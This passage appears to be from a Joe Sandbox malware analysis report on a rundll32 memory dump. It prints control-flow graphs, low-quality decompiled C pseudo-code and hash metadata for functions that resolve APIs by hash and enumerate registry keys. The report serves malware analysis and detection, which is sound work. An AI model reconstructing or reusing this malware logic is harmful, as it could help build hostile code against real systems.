17b359e1d77-17b359e1d7e 504->507 508 17b359e1d71 504->508 509 17b359e1d80 507->509 510 17b359e1d8c 507->510 508->507 511 17b359e1d82 call 17b359e240c 509->511 512 17b359e1d94-17b359e1da5 call 17b359e908c 510->512 513 17b359e1d87-17b359e1d8a 511->513 516 17b359e1da7 512->516 517 17b359e1dad-17b359e1db0 512->517 513->512 516->517 518 17b359e1db6-17b359e1dc9 call 17b359e908c 517->518 519 17b359e1ea1-17b359e1ebb HeapFree * 2 517->519 522 17b359e1dd5 518->522 523 17b359e1dcb-17b359e1dd3 518->523 519->503 524 17b359e1dd8-17b359e1deb call 17b359e908c 522->524 523->524 528 17b359e1df7 524->528 529 17b359e1ded-17b359e1df5 524->529 530 17b359e1dfa-17b359e1dff 528->530 529->530 532 17b359e1e02 call 17b359e240c 530->532 533 17b359e1e07-17b359e1e0d 532->533 534 17b359e1e93-17b359e1e9b HeapFree 533->534 535 17b359e1e13-17b359e1e7c call 17b359e47b0 call 17b359e6518 533->535 534->519 540 17b359e1e85-17b359e1e8d HeapFree 535->540 541 17b359e1e7e-17b359e1e83 535->541 540->534 541->540
                                C-Code - Quality: 17%
                                			E0000017B17B359E1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
				long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				char _v104;
				signed int _v112;
				long long _v120;
				long long _v128;
				intOrPtr _v136;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t65;
				intOrPtr _t93;
				intOrPtr _t94;
				long long* _t148;
				long long* _t152;
				long long* _t155;
				long long* _t157;
				intOrPtr* _t188;
				intOrPtr _t189;
				long long _t192;
				long long* _t193;
				void* _t203;
				intOrPtr _t213;
				long long _t214;

				_t157 = __rbx;
				_t148 = __rax;
				_a24 = __rbx;
				_a16 = __rdx;
				_t214 =  *0x359ed458;
				_t192 =  *((intOrPtr*)(__rcx));
				r13d = r8d;
				_t193 = __rcx;
				_v72 = _t214;
				_v96 = _t192;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x359e1c4a;
				E0000017B17B359E47B8(0, __rax, __rbx, __rcx, __rdx);
				E0000017B17B359E908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t148 == _t157) goto 0x359e1c63;
				_t9 = _t192 + 0x18; // 0x18
				 *_t148();
				_t65 =  *(_t193 + 0x50) & 0x000000ff;
				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0x359e1cdd;
				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
				_t93 =  *_t188;
				if (_t93 == 0) goto 0x359e1c94;
				if (_t93 == 0x2f) goto 0x359e1c90;
				_t94 =  *((intOrPtr*)(_t188 + 1));
				if (_t94 != 0) goto 0x359e1c82;
				if (_t94 != 0) goto 0x359e1c97;
				_t152 = _t157;
				if (_t152 == _t157) goto 0x359e1caf;
				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0x359e1caf;
				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0x359e1caf;
				E0000017B17B359E240C(0, _t157, _t9 + _t188, _t192, _t193);
				if (_t152 == _t157) goto 0x359e1cdd;
				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
				_a8 = 0;
				goto 0x359e1ceb;
				E0000017B17B359E908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t152 == _t157) goto 0x359e1d09;
				 *_t152();
				if (_t152 == _t157) goto 0x359e1ed1;
				_t23 =  &_v104; // 0x2
				r9d = 0;
				r8d = r13d;
				_v112 = _t23;
				_t25 =  &_v88; // 0x12
				_t189 = _a16;
				_v120 = _t25;
				_t27 =  &_v80; // 0x1a
				_t155 = _t27;
				_v128 = _t155;
				_v136 = 0;
				if (E0000017B17B359E5168(_t157, _t193, _t189, _t203) != 0) goto 0x359e1ec1;
				_t213 =  *0x359ed458;
				E0000017B17B359E908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0x359e1d77;
				 *_t155();
				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0x359e1d8c;
				E0000017B17B359E240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
				goto 0x359e1d94;
				E0000017B17B359E908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0x359e1dad;
				 *_t155();
				if (_a8 == _t157) goto 0x359e1ea1;
				E0000017B17B359E908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
				if (_t155 == _t157) goto 0x359e1dd5;
				r14d =  *_t155();
				goto 0x359e1dd8;
				r14d = 0;
				E0000017B17B359E908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
				if (_t155 == _t157) goto 0x359e1df7;
				r13d =  *_t155();
				goto 0x359e1dfa;
				r13d = 0;
				_t40 = _t214 + 2; // 0x2
				E0000017B17B359E240C(_t213 + _t40, _t157, _t152, _t192, _a8);
				if (_t155 == _t157) goto 0x359e1e93;
				_t41 = _t213 + 1; // 0x1
				r8d = _t41;
				 *((char*)(_t189 + _t155)) = 0x2f;
				0x359e47b0();
				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
				_v120 = _a48;
				_v128 = _a40;
				_v136 = _v104;
				if (E0000017B17B359E6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0x359e1e85;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x359e1ed6;
				return 8;
			}





























                                0x17b359e1bfc
                                0x17b359e1bfc
                                0x17b359e1bfc
                                0x17b359e1c01
                                0x17b359e1c15
                                0x17b359e1c1f
                                0x17b359e1c28
                                0x17b359e1c2e
                                0x17b359e1c31
                                0x17b359e1c36
                                0x17b359e1c41
                                0x17b359e1c45
                                0x17b359e1c53
                                0x17b359e1c5b
                                0x17b359e1c5d
                                0x17b359e1c61
                                0x17b359e1c67
                                0x17b359e1c6d
                                0x17b359e1c75
                                0x17b359e1c7c
                                0x17b359e1c80
                                0x17b359e1c85
                                0x17b359e1c8a
                                0x17b359e1c8e
                                0x17b359e1c92
                                0x17b359e1c94
                                0x17b359e1c9a
                                0x17b359e1ca0
                                0x17b359e1ca6
                                0x17b359e1cb6
                                0x17b359e1cc1
                                0x17b359e1cc8
                                0x17b359e1ccc
                                0x17b359e1cdb
                                0x17b359e1cf4
                                0x17b359e1cfc
                                0x17b359e1d07
                                0x17b359e1d0c
                                0x17b359e1d12
                                0x17b359e1d17
                                0x17b359e1d1a
                                0x17b359e1d1d
                                0x17b359e1d22
                                0x17b359e1d27
                                0x17b359e1d2a
                                0x17b359e1d2f
                                0x17b359e1d2f
                                0x17b359e1d37
                                0x17b359e1d3c
                                0x17b359e1d49
                                0x17b359e1d4f
                                0x17b359e1d67
                                0x17b359e1d6f
                                0x17b359e1d75
                                0x17b359e1d7e
                                0x17b359e1d82
                                0x17b359e1d8a
                                0x17b359e1d9d
                                0x17b359e1da5
                                0x17b359e1dab
                                0x17b359e1db0
                                0x17b359e1dc1
                                0x17b359e1dc9
                                0x17b359e1dd0
                                0x17b359e1dd3
                                0x17b359e1dd5
                                0x17b359e1de3
                                0x17b359e1deb
                                0x17b359e1df2
                                0x17b359e1df5
                                0x17b359e1df7
                                0x17b359e1dfa
                                0x17b359e1e02
                                0x17b359e1e0d
                                0x17b359e1e16
                                0x17b359e1e16
                                0x17b359e1e1f
                                0x17b359e1e26
                                0x17b359e1e52
                                0x17b359e1e5e
                                0x17b359e1e67
                                0x17b359e1e6c
                                0x17b359e1e7c
                                0x17b359e1e81
                                0x17b359e1e8d
                                0x17b359e1e9b
                                0x17b359e1eab
                                0x17b359e1ebb
                                0x17b359e1ec9
                                0x17b359e1ecf
                                0x17b359e1eef

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 9bac9eea6c1d34af3320a538358d84060d47aa1213f1a91b253a0499f03b5103
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 6D81733670CAC086DB60DB7AE4903EEA7B1BBC9B84F684525EA8E47755DF38C4C59700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359EA238 Relevance: 6.4, APIs: 5, Instructions: 127memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 19%
                                			E0000017B17B359EA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
				char _v72;
				char _v80;
				char _v88;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t41;
				void* _t43;
				long long* _t82;
				long long _t83;
				long long _t84;
				intOrPtr _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t112;
				void* _t115;
				long long* _t118;
				void* _t130;
				long _t133;
				void* _t134;
				long _t136;
				void* _t139;

				_t84 = __rbx;
				_t82 = _t118;
				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x18)) = __r8;
				_t3 = _t82 + 0x20; // 0xfb849fa7
				_t134 = __rcx;
				E0000017B17B359E24B0(__rbx, _t3, _t112);
				if (_t82 == 0) goto 0x359ea3dc;
				E0000017B17B359E908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t82 == 0) goto 0x359ea29f;
				_v88 =  *_t82();
				goto 0x359ea2a5;
				_v88 = 0;
				_t10 = _t82 + 1; // 0x1
				r8d = _t109 + _t10;
				HeapAlloc(_t139, _t136, _t133);
				_v80 = _t82;
				if (_t82 == 0) goto 0x359ea3ce;
				0x359e47b0();
				_t13 = _t109 + 1; // 0x1
				r8d = _t13;
				0x359e47b0();
				E0000017B17B359E908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t82 == 0) goto 0x359ea30d;
				 *_t82();
				goto 0x359ea30f;
				_t16 =  &_a32; // 0xfb84a007
				_t17 =  &_v72; // 0xfb849f9f
				r8d = 0;
				_v104 = _t16;
				_t41 = E0000017B17B359E7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0x359ed458 + 8)), _t17, _t130, _t109);
				HeapFree(??, ??, ??);
				if (_t41 != 0) goto 0x359ea3ce;
				r8d = _a32;
				_t108 = _v72;
				_t21 =  &_v88; // 0xfb849f8f
				_t83 = _t21;
				_t22 =  &_v80; // 0xfb849f87
				_v104 = _t83;
				_t43 = E0000017B17B359E52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0x359ed458 + 8)), _t22, _t112, _t115);
				_t110 = _v80;
				if (_v88 == 0) goto 0x359ea389;
				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0x359ea389;
				if (_t134 - 1 != 0) goto 0x359ea37a;
				 *((char*)(_t83 + _t110)) = 0;
				if (_t43 != 0) goto 0x359ea3b0;
				E0000017B17B359E7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0x359ed458 + 8)));
				if (_t83 != 0) goto 0x359ea3a5;
				_t29 = _t83 + 8; // 0x8
				goto 0x359ea3b0;
				 *_a24 = _t83;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t29;
			}


























                                0x17b359ea238
                                0x17b359ea238
                                0x17b359ea23b
                                0x17b359ea23f
                                0x17b359ea25c
                                0x17b359ea265
                                0x17b359ea26d
                                0x17b359ea278
                                0x17b359ea288
                                0x17b359ea290
                                0x17b359ea299
                                0x17b359ea29d
                                0x17b359ea2a1
                                0x17b359ea2b1
                                0x17b359ea2b1
                                0x17b359ea2b6
                                0x17b359ea2bf
                                0x17b359ea2c7
                                0x17b359ea2dd
                                0x17b359ea2e2
                                0x17b359ea2e2
                                0x17b359ea2ed
                                0x17b359ea2fc
                                0x17b359ea304
                                0x17b359ea309
                                0x17b359ea30b
                                0x17b359ea30f
                                0x17b359ea317
                                0x17b359ea31c
                                0x17b359ea31f
                                0x17b359ea32a
                                0x17b359ea339
                                0x17b359ea341
                                0x17b359ea347
                                0x17b359ea34f
                                0x17b359ea354
                                0x17b359ea354
                                0x17b359ea359
                                0x17b359ea361
                                0x17b359ea366
                                0x17b359ea36f
                                0x17b359ea378
                                0x17b359ea381
                                0x17b359ea387
                                0x17b359ea38b
                                0x17b359ea391
                                0x17b359ea396
                                0x17b359ea39e
                                0x17b359ea3a0
                                0x17b359ea3a3
                                0x17b359ea3ad
                                0x17b359ea3b8
                                0x17b359ea3c8
                                0x17b359ea3d6
                                0x17b359ea3f5

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: 2d05cc18f9ed2a87b7a6d77bc229425c709979d7adb832fb92d67eee268c1f8d
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: A741A03130C78099EB65DB6AA48479A67B1FFC9BC4F244225EE4E43B55EF38C9C58700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E2DC4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 648 17b359e2dc4-17b359e2e0e 649 17b359e2e13 call 17b359e4320 648->649 650 17b359e2e18-17b359e2e1a 649->650 651 17b359e2e29-17b359e2e2e 650->651 652 17b359e2e1c-17b359e2e27 650->652 653 17b359e2e34-17b359e2e44 651->653 652->653 654 17b359e2e47 call 17b359e4880 653->654 655 17b359e2e4c-17b359e2e50 654->655 656 17b359e2e56-17b359e2e6c 655->656 657 17b359e2f94-17b359e2f9a 655->657 658 17b359e2e8d-17b359e2ee8 call 17b359e1bfc HeapFree 656->658 659 17b359e2e6e-17b359e2e88 656->659 660 17b359e2fc2 657->660 661 17b359e2f9c-17b359e2faa call 17b359e47b8 657->661 668 17b359e2eea-17b359e2eec 658->668 669 17b359e2f01-17b359e2f03 658->669 659->658 664 17b359e2fc7 660->664 670 17b359e2faf-17b359e2fb1 661->670 667 17b359e2fcd-17b359e2fd1 664->667 671 17b359e2fd3-17b359e2fe4 call 17b359e908c 667->671 672 17b359e302f-17b359e3032 667->672 674 17b359e2ef6-17b359e2efc call 17b359ea3f8 668->674 675 17b359e2eee-17b359e2ef4 668->675 669->657 677 17b359e2f09-17b359e2f46 call 17b359e6c1c call 17b359e7b6c 669->677 670->667 676 17b359e2fb3-17b359e2fc0 670->676 685 17b359e2fe6 671->685 686 17b359e2fed-17b359e2ff0 671->686 678 17b359e3034-17b359e3044 HeapFree 672->678 679 17b359e308e-17b359e30a0 672->679 674->669 675->669 675->674 676->667 697 17b359e2f48-17b359e2f6d 677->697 698 17b359e2f71-17b359e2f92 HeapFree call 17b359e47b8 677->698 683 17b359e3046-17b359e304c 678->683 684 17b359e304e-17b359e305f call 17b359e908c 678->684 683->679 683->684 694 17b359e3067-17b359e3086 call 17b359e908c 684->694 695 17b359e3061 684->695 685->686 690 17b359e2ff2-17b359e2ffb 686->690 691 17b359e301c-17b359e302b 686->691 690->691 696 17b359e2ffd-17b359e300d call 17b359e47b8 690->696 691->672 694->679 706 17b359e3088 694->706 695->694 696->691 707 17b359e300f-17b359e3017 696->707 697->667 701 17b359e2f6f 697->701 698->670 701->664 706->679 707->691
                                C-Code - Quality: 41%
                                			E0000017B17B359E2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v88;
				void* _v96;
				void* _v104;
				long long _v112;
				signed int _v120;
				long long _v128;
				long long _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t72;
				signed int _t80;
				void* _t81;
				void* _t97;
				signed int _t98;
				void* _t99;
				void* _t114;
				long long* _t139;
				signed long long _t140;
				long long* _t142;
				void* _t143;
				void* _t169;
				void* _t170;
				void* _t172;
				signed int _t173;
				long _t177;
				void* _t179;
				void* _t190;
				void* _t191;
				void* _t192;
				signed int* _t193;
				long long _t194;
				void* _t200;
				long _t202;
				void* _t205;

				_t191 = _t179;
				 *((long long*)(_t191 + 0x18)) = __r8;
				 *((long long*)(_t191 + 0x10)) = __rdx;
				_t203 =  *0x359ed458;
				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
				_t170 = __rcx;
				_v120 =  *0x359ed450;
				r15d = 0;
				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
				_v112 =  *((intOrPtr*)( *0x359ed458 + 8));
				if (E0000017B17B359E4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0x359e2e29;
				_t12 = _t205 + 1; // 0x1
				r12d = _t12;
				_v104 = _t172;
				goto 0x359e2e34;
				_t173 = _v104;
				r12d = 2;
				_t15 =  &_a32; // 0xca
				if (E0000017B17B359E4880(r12d, _t114,  *((intOrPtr*)( *0x359ed458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0x359e2f94;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t193 = _v96;
				if (_t173 == 0) goto 0x359e2e8d;
				_t72 = _a8;
				_t193[0xa] = 1;
				_t193[0x12] = _t173;
				_t193[0xd] = _t72;
				_t193[0x10] = _t72;
				_t25 = _t170 + 0xc0; // 0xc0
				r9d = 0;
				 *_t193 = _v120 ^ 0x62ade362;
				_t193[3] =  *(_t170 + 0x48);
				_t193[2] =  *(_t170 + 0x4c);
				_t30 =  &_a8; // 0xb2
				_v128 = _t30;
				_t32 =  &_v120; // 0x32
				_v136 = _t32;
				_t97 = E0000017B17B359E1BFC(_t32, _t143, _t25, _t193);
				HeapFree(_t205, _t202, _t200);
				if (r13d == 0) goto 0x359e2f01;
				if (_t97 == 0) goto 0x359e2ef6;
				if (_t97 != 0x10d2) goto 0x359e2f01;
				E0000017B17B359EA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
				if (_t97 != 0) goto 0x359e2f94;
				_t98 = _a8;
				_t194 = _v120;
				r13d =  *(_t170 + 0x4c);
				_t80 = E0000017B17B359E6C1C(_t98, _t194);
				_t38 =  &_a8; // 0xb2
				r9d = 1;
				 *(_t170 + 0x48) = _t98;
				 *(_t170 + 0x4c) = _t80;
				_t81 = E0000017B17B359E7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
				_t99 = _t81;
				if (_t81 != 0) goto 0x359e2f71;
				_t139 = _a16;
				 *_t139 = _t194;
				 *_a24 = _a8;
				if ( *(_t170 + 0x4c) != r13d) goto 0x359e2fcd;
				goto 0x359e2fc7;
				HeapFree(_t172, _t177, _t143);
				_t47 = _t170 + 0xc0; // 0xc0
				E0000017B17B359E47B8(_t99, _t139, _t143, _t47, _t177);
				goto 0x359e2faf;
				if (_t99 == 0x10d2) goto 0x359e2fc2;
				_t48 = _t170 + 0xc0; // 0xc0
				if (E0000017B17B359E47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0x359e2fcd;
				asm("lock or dword [edi+0xec], 0x1");
				goto 0x359e2fcd;
				r15d = 1;
				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0x359e302f;
				E0000017B17B359E908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0x359ed458 + 0x18)));
				if (_t139 == 0) goto 0x359e2fed;
				 *_t139();
				if (r15d == 0) goto 0x359e301c;
				_t140 =  *((intOrPtr*)(_t170 + 0x58));
				if (_v88 - _t140 <= 0) goto 0x359e301c;
				_t57 = _t170 + 0xc0; // 0xc1
				if (E0000017B17B359E47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0x359e301c;
				asm("lock or dword [edi+0xec], 0x1");
				_t142 = _t140 * 0x23c34600 + _v88;
				 *((long long*)(_t170 + 0x58)) = _t142;
				if (_v104 == 0) goto 0x359e308e;
				HeapFree(??, ??, ??);
				if (_t99 == 0) goto 0x359e304e;
				if (_t99 != 0x10d2) goto 0x359e308e;
				E0000017B17B359E908C(0x4a75e5e7, _t142,  *((intOrPtr*)( *0x359ed458 + 0x10)));
				if (_t142 == 0) goto 0x359e3067;
				 *_t142();
				 *(_t170 + 0x98) =  *(_t170 + 0x98) & 0x00000000;
				 *(_t170 + 0x9c) =  *(_t170 + 0x9c) & 0x00000000;
				E0000017B17B359E908C(0x8d72aad2, _t142,  *((intOrPtr*)(_t203 + 0x10)));
				if (_t142 == 0) goto 0x359e308e;
				 *_t142();
				return _t99;
			}







































                                0x17b359e2dc4
                                0x17b359e2dc7
                                0x17b359e2dcb
                                0x17b359e2ddf
                                0x17b359e2de6
                                0x17b359e2deb
                                0x17b359e2dfc
                                0x17b359e2e04
                                0x17b359e2e07
                                0x17b359e2e0e
                                0x17b359e2e1a
                                0x17b359e2e1e
                                0x17b359e2e1e
                                0x17b359e2e22
                                0x17b359e2e27
                                0x17b359e2e29
                                0x17b359e2e2e
                                0x17b359e2e34
                                0x17b359e2e50
                                0x17b359e2e56
                                0x17b359e2e5e
                                0x17b359e2e61
                                0x17b359e2e64
                                0x17b359e2e6c
                                0x17b359e2e6e
                                0x17b359e2e75
                                0x17b359e2e7e
                                0x17b359e2e83
                                0x17b359e2e88
                                0x17b359e2e91
                                0x17b359e2e98
                                0x17b359e2ea3
                                0x17b359e2eaa
                                0x17b359e2eb2
                                0x17b359e2eb7
                                0x17b359e2ebf
                                0x17b359e2ec4
                                0x17b359e2ec9
                                0x17b359e2edd
                                0x17b359e2edf
                                0x17b359e2ee8
                                0x17b359e2eec
                                0x17b359e2ef4
                                0x17b359e2efc
                                0x17b359e2f03
                                0x17b359e2f09
                                0x17b359e2f10
                                0x17b359e2f15
                                0x17b359e2f1e
                                0x17b359e2f23
                                0x17b359e2f2b
                                0x17b359e2f37
                                0x17b359e2f3a
                                0x17b359e2f3d
                                0x17b359e2f42
                                0x17b359e2f46
                                0x17b359e2f48
                                0x17b359e2f58
                                0x17b359e2f67
                                0x17b359e2f6d
                                0x17b359e2f6f
                                0x17b359e2f7e
                                0x17b359e2f84
                                0x17b359e2f8d
                                0x17b359e2f92
                                0x17b359e2f9a
                                0x17b359e2f9c
                                0x17b359e2fb1
                                0x17b359e2fb3
                                0x17b359e2fc0
                                0x17b359e2fc7
                                0x17b359e2fd1
                                0x17b359e2fdc
                                0x17b359e2fe4
                                0x17b359e2feb
                                0x17b359e2ff0
                                0x17b359e2ff2
                                0x17b359e2ffb
                                0x17b359e2ffd
                                0x17b359e300d
                                0x17b359e300f
                                0x17b359e3026
                                0x17b359e302b
                                0x17b359e3032
                                0x17b359e303c
                                0x17b359e3044
                                0x17b359e304c
                                0x17b359e3057
                                0x17b359e305f
                                0x17b359e3065
                                0x17b359e3067
                                0x17b359e306e
                                0x17b359e307e
                                0x17b359e3086
                                0x17b359e308c
                                0x17b359e30a0

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc
                                • String ID: uJ
                                • API String ID: 3901518246-2850656762
                                • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction ID: 0aff06a091149d2ecce26a179196eae53501b62235ae933b5e4735799297e87e
                                • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                                • Instruction Fuzzy Hash: 62819E3220D78096EB65CB2AE484BDAB3B4FB88784F644625EE4D47B85DB39D4D5CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000017B359E5EE8 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 708 17b359e5ee8-17b359e5f0d 709 17b359e5f28-17b359e5f2d 708->709 710 17b359e5f0f-17b359e5f20 call 17b359e908c 708->710 711 17b359e5f48-17b359e5f4d 709->711 712 17b359e5f2f-17b359e5f40 call 17b359e908c 709->712 710->709 718 17b359e5f22 710->718 715 17b359e5f68-17b359e5f6f 711->715 716 17b359e5f4f-17b359e5f60 call 17b359e908c 711->716 712->711 725 17b359e5f42 712->725 721 17b359e5f71-17b359e5f76 HeapFree 715->721 722 17b359e5f7c-17b359e5f83 715->722 716->715 729 17b359e5f62 716->729 718->709 721->722 723 17b359e5f85-17b359e5f8a HeapFree 722->723 724 17b359e5f90-17b359e5f97 722->724 723->724 727 17b359e5f99-17b359e5f9e HeapFree 724->727 728 17b359e5fa4-17b359e5fab 724->728 725->711 727->728 730 17b359e5fb8-17b359e5fc7 728->730 731 17b359e5fad-17b359e5fb2 HeapFree 728->731 729->715 731->730
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 54cb198ecbd0fb5da84fc14fef4d7b92d0124b8b65483e6b8917e8781eecb553
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 4721F531209B5081EB99DB7AE5803AD63B1FF89B84F685615DE4D537AACF28C8C1C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Function 00000201A29A37E0 Relevance: 10.8, APIs: 7, Instructions: 333memoryregistryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 201a29a37e0-201a29a3845 GetModuleHandleA call 201a29a40f8 3 201a29a38bf-201a29a38c2 0->3 4 201a29a3847-201a29a3858 call 201a29a908c 0->4 6 201a29a3cc0-201a29a3cd5 3->6 7 201a29a38c8-201a29a38e1 HeapAlloc 3->7 12 201a29a385a-201a29a3864 4->12 13 201a29a3866 4->13 9 201a29a3cbb 7->9 10 201a29a38e7-201a29a3905 call 201a29a487a call 201a29a908c 7->10 9->6 21 201a29a390d-201a29a394c call 201a29a638c call 201a29a908c 10->21 22 201a29a3907 10->22 15 201a29a3869-201a29a387a call 201a29a40f8 12->15 13->15 15->3 23 201a29a387c-201a29a3888 call 201a29a5fc8 15->23 33 201a29a395e 21->33 34 201a29a394e-201a29a395c 21->34 22->21 26 201a29a388d-201a29a3892 23->26 26->3 28 201a29a3894-201a29a38aa call 201a29a5fc8 26->28 28->3 35 201a29a38ac-201a29a38bd call 201a29a5fc8 28->35 36 201a29a3961-201a29a3968 33->36 34->36 35->3 37 201a29a396a-201a29a397b call 201a29a908c 36->37 38 201a29a398e-201a29a39b6 HeapAlloc 36->38 50 201a29a397d-201a29a397f 37->50 51 201a29a3984-201a29a3989 37->51 42 201a29a39bc-201a29a39d0 call 201a29a908c 38->42 43 201a29a3a8e 38->43 55 201a29a39fb 42->55 56 201a29a39d2-201a29a39f9 RegOpenKeyW 42->56 45 201a29a3a93-201a29a3a99 43->45 48 201a29a3a9f-201a29a3ae9 call 201a29a47b0 call 201a29aa0ac 45->48 49 201a29a3cb1-201a29a3cb9 call 201a29a6ce4 45->49 69 201a29a3aeb-201a29a3b03 call 201a29aa0ac 48->69 70 201a29a3b05-201a29a3b08 48->70 49->6 63 201a29a3caa 50->63 54 201a29a3cac-201a29a3caf 51->54 54->6 54->49 60 201a29a39fe-201a29a3a00 55->60 56->60 64 201a29a3a7e-201a29a3a8c HeapFree 60->64 65 201a29a3a02-201a29a3a13 call 201a29a908c 60->65 63->54 64->45 71 201a29a3a30 65->71 72 201a29a3a15-201a29a3a2e RegEnumKeyW 65->72 69->70 70->49 74 201a29a3b0e-201a29a3b1f call 201a29a5058 70->74 75 201a29a3a33-201a29a3a35 71->75 72->75 84 201a29a3b4b-201a29a3b4e 74->84 85 201a29a3b21-201a29a3b35 call 201a29a405c 74->85 78 201a29a3a4c-201a29a3a52 75->78 79 201a29a3a37-201a29a3a4a 